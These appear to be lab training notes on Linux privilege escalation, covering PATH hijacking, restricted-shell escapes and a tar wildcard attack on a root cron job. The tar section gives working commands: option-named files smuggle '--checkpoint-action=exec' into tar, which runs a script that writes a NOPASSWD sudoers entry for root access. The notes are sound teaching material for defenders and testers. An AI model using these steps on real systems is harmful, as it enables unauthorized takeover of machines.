- [Path Abuse](#Path-Abuse)
- [Wildcard Abuse](#Wildcard-Abuse)
- [Escaping Restricted Shells](#Escaping-Restricted-Shells)
  * [Escaping](#Escaping)

# Path Abuse

`PATH` is an environment variable that specifies the set of directories where an executable can be located. An account's PATH variable is a set of absolute paths, allowing a user to type a command without specifying the absolute path to the binary. 

For example, a user can type `cat /tmp/test.txt` instead of specifying the absolute path `/bin/cat /tmp/test.txt`. We can check the contents of the PATH variable by typing `env | grep PATH` or `echo $PATH`.

```
$ echo $PATH

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
```

Creating a script or program in a directory specified in the PATH will make it executable from any directory on the system.
```
$ pwd && conncheck 

/usr/local/sbin
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1189/sshd       
tcp        0     88 10.129.2.12:22          10.10.14.3:43218        ESTABLISHED 1614/sshd: mrb3n [p
tcp6       0      0 :::22                   :::*                    LISTEN      1189/sshd       
tcp6       0      0 :::80                   :::*                    LISTEN      1304/apache2
```

As shown below, the `conncheck` script created in `/usr/local/sbin` will still run when in the `/tmp` directory because it was created in a directory specified in the PATH.
```
$ pwd && conncheck 

/tmp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1189/sshd       
tcp        0    268 10.129.2.12:22          10.10.14.3:43218        ESTABLISHED 1614/sshd: mrb3n [p
tcp6       0      0 :::22                   :::*                    LISTEN      1189/sshd       
tcp6       0      0 :::80                   :::*                    LISTEN      1304/apache2
```

Adding `.` to a user's PATH adds their current working directory to the list. 

For example, if we can modify a user's path, we could replace a common binary such as `ls` with a malicious script such as a reverse shell. If we add `.` to the path by issuing the command `PATH=.:$PATH` and then `export PATH`, we will be able to run binaries located in our current working directory by just typing the name of the file (i.e. just typing `ls` will call the malicious script named `ls` in the current working directory instead of the binary located at `/bin/ls`).
```
$ echo $PATH

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

$ PATH=.:${PATH}
$ export PATH
$ echo $PATH

.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
```

In this example, we modify the path to run a simple `echo` command when the command `ls` is typed.
```
$ touch ls
$ echo 'echo "PATH ABUSE!!"' > ls
$ chmod +x ls
$ ls

PATH ABUSE!!
```

---

# Wildcard Abuse

A wildcard character can be used as a replacement for other characters and are interpreted by the shell before other actions. Examples of wild cards include:

|Character	|Significance|
|-|-|
|`*`	|An asterisk that can match any number of characters in a file name.|
|`?`	|Matches a single character.|
|`[ ]`	|Brackets enclose characters and can match any single one at the defined position.|
|`~`	|A tilde at the beginning expands to the name of the user home directory or can have another username appended to refer to that user's home directory.|
|`-`	|A hyphen within brackets will denote a range of characters.|

An example of how wildcards can be abused for privilege escalation is the `tar` command, a common program for creating/extracting archives. If we look at the man page for the `tar` command, we see the following:
```
$ man tar

<SNIP>
Informative output
       --checkpoint[=N]
              Display progress messages every Nth record (default 10).

       --checkpoint-action=ACTION
              Run ACTION on each checkpoint.
```

The `--checkpoint-action` option permits an `EXEC` action to be executed when a checkpoint is reached (i.e., run an arbitrary operating system command once the tar command executes.) By creating files with these names, when the wildcard is specified, `--checkpoint=1` and `--checkpoint-action=exec=sh root.sh` is passed to `tar` as command-line options. Let's see this in practice.

Consider the following cron job, which is set up to back up the `/home/htb-student` directory's contents and create a compressed archive within `/home/htb-student`. The cron job is set to run every minute, so it is a good candidate for privilege escalation.
```
#
#
mh dom mon dow command
*/01 * * * * cd /home/htb-student && tar -zcf /home/htb-student/backup.tar.gz *
```

We can leverage the wild card in the cron job to write out the necessary commands as file names with the above in mind. When the cron job runs, these file names will be interpreted as arguments and execute any commands that we specify.

```
$ echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
$ echo "" > "--checkpoint-action=exec=sh root.sh"
$ echo "" > --checkpoint=1
```
We can check and see that the necessary files were created.

```
$ ls -la

total 56
drwxrwxrwt 10 root        root        4096 Aug 31 23:12 .
drwxr-xr-x 24 root        root        4096 Aug 31 02:24 ..
-rw-r--r--  1 root        root         378 Aug 31 23:12 backup.tar.gz
-rw-rw-r--  1 htb-student htb-student    1 Aug 31 23:11 --checkpoint=1
-rw-rw-r--  1 htb-student htb-student    1 Aug 31 23:11 --checkpoint-action=exec=sh root.sh
drwxrwxrwt  2 root        root        4096 Aug 31 22:36 .font-unix
drwxrwxrwt  2 root        root        4096 Aug 31 22:36 .ICE-unix
-rw-rw-r--  1 htb-student htb-student   60 Aug 31 23:11 root.sh
```

Once the cron job runs again, we can check for the newly added sudo privileges and sudo to root directly.

```
$ sudo -l

Matching Defaults entries for htb-student on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User htb-student may run the following commands on NIX02:
    (root) NOPASSWD: ALL
```

---

# Escaping Restricted Shells

A restricted shell limits the commands a user can execute, restricting them to a specific set of commands or directories. They are commonly used to create safe environments, preventing accidental or intentional system damage. Common examples include `rbash` on Linux and the Restricted-access Shell on Windows.

**RBASH** – A restricted version of the Bourne shell that limits the ability to change directories, modify environment variables, and execute commands outside permitted directories.

**RKSH** – A restricted version of the Korn shell that prevents executing commands in other directories, creating/modifying shell functions, and altering the shell environment.

**RZSH** – A restricted version of the Z shell that limits running shell scripts, defining aliases, and modifying the shell environment.

For example, administrators commonly use restricted shells in enterprise networks to create safe, controlled environments. By limiting users' command execution and directory access, administrators prevent actions that could harm the system or compromise security, while controlling which resources and features each user can access.

Consider a company with Linux servers hosting critical applications, accessed by employees, contractors, and external partners. To protect the network, the IT team implements restricted shells, assigning users to specific shells based on their needs:

- **External partners** are assigned `rbash`, limiting them to basic features like email and file sharing.
- **Contractors** are assigned `rksh`, granting more flexibility for accessing database and web servers while still maintaining restrictions.
- **Employees** are assigned `rzsh`, providing the most flexibility for running specific applications or scripts, while still enforcing limitations.

Several methods can be used to escape from a restricted shell. Some of these methods involve exploiting vulnerabilities in the shell itself, while others involve using creative techniques to bypass the restrictions imposed by the shell. Here are a few examples of methods that can be used to escape from a restricted shell.

---

## Escaping

In some cases, it may be possible to escape from a restricted shell by injecting commands into the command line or other inputs the shell accepts. For example, suppose the shell allows users to execute commands by passing them as arguments to a built-in command. In that case, it may be possible to escape from the shell by injecting additional commands into the argument.

### Command injection

Imagine that we are in a restricted shell that allows us to execute commands by passing them as arguments to the `ls` command. Unfortunately, the shell only allows us to execute the `ls` command with a specific set of arguments, such as `ls -l` or `ls -a`, but it does not allow us to execute any other commands. In this situation, we can use command injection to escape from the shell by injecting additional commands into the argument of the `ls` command.

For example, we could use the following command to inject a `pwd` command into the argument of the `ls` command:
```
$ ls -l `pwd`
```

This command would cause the `ls` command to be executed with the argument `-l`, followed by the output of the `pwd` command. Since the `pwd` command is not restricted by the shell, this would allow us to execute the `pwd` command and see the current working directory, even though the shell does not allow us to execute the `pwd` command directly.

### Command Substitution

Another method for escaping from a restricted shell is to use command substitution. This involves using the shell's command substitution syntax to execute a command. 

For example, imagine the shell allows users to execute commands by enclosing them in backticks (`). In that case, it may be possible to escape from the shell by executing a command in a backtick substitution that is not restricted by the shell.

### Command Chaining

In some cases, it may be possible to escape from a restricted shell by using command chaining. We would need to use multiple commands in a single command line, separated by a shell metacharacter, such as a semicolon (;) or a vertical bar (|), to execute a command. 

For example, if the shell allows users to execute commands separated by semicolons, it may be possible to escape from the shell by using a semicolon to separate two commands, one of which is not restricted by the shell.

### Environment Variables

For escaping from a restricted shell to use environment variables involves modifying or creating environment variables that the shell uses to execute commands that are not restricted by the shell. 

For example, if the shell uses an environment variable to specify the directory in which commands are executed, it may be possible to escape from the shell by modifying the value of the environment variable to specify a different directory.

### Shell Functions

In some cases, it may be possible to escape from a restricted shell by using shell functions. For this we can define and call shell functions that execute commands not restricted by the shell. Let us say, the shell allows users to define and call shell functions, it may be possible to escape from the shell by defining a shell function that executes a command.


